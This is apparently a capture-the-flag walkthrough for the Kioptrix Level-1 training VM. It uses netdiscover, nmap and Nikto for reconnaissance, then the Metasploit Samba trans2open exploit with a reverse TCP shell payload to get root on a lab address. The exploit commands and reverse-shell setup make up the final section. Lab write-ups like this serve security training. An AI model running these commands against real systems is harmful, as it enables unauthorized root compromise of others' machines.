Categories

Archives

CTF Challenges

Hack The Kioptrix Level-1

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

You can Download it from here and run install in your VM.

Table of content

  • Network scaning
  • Enumeration
  • Exploitation
  • Root access

Lets start!!

Turn on your attacking machine and use netdiscover command to scan your local network to get target IP.

So we target at 192.168.1.109 let go for its enumeration and scan open ports and protocols. With help nmap aggressive scan we have observe several open port and service running on it.

nmap -A 192.168.1.109

We also use Nikto for scanning vulnerability with help of following command:

nikto -h http://192.168.1.109

It was very good to see the multiple vulnerability present in this lab.

Since with help of above enumeration it becomes clear that the lab can exploit in multiple therefore without wasting time we execute following command with help of metasploit and try to comprise target’s VM machine.

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

use exploit/linux/samba/trans2open
msf exploit(linux/samba/trans2open) > set rhost 192.168.1.109
msf exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
msf exploit(linux/samba/trans2open) > set lhost 192.168.1.107
msf exploit(linux/samba/trans2open) > exploit

B0000MM!! Here we have command shell of victim’s machine with root access.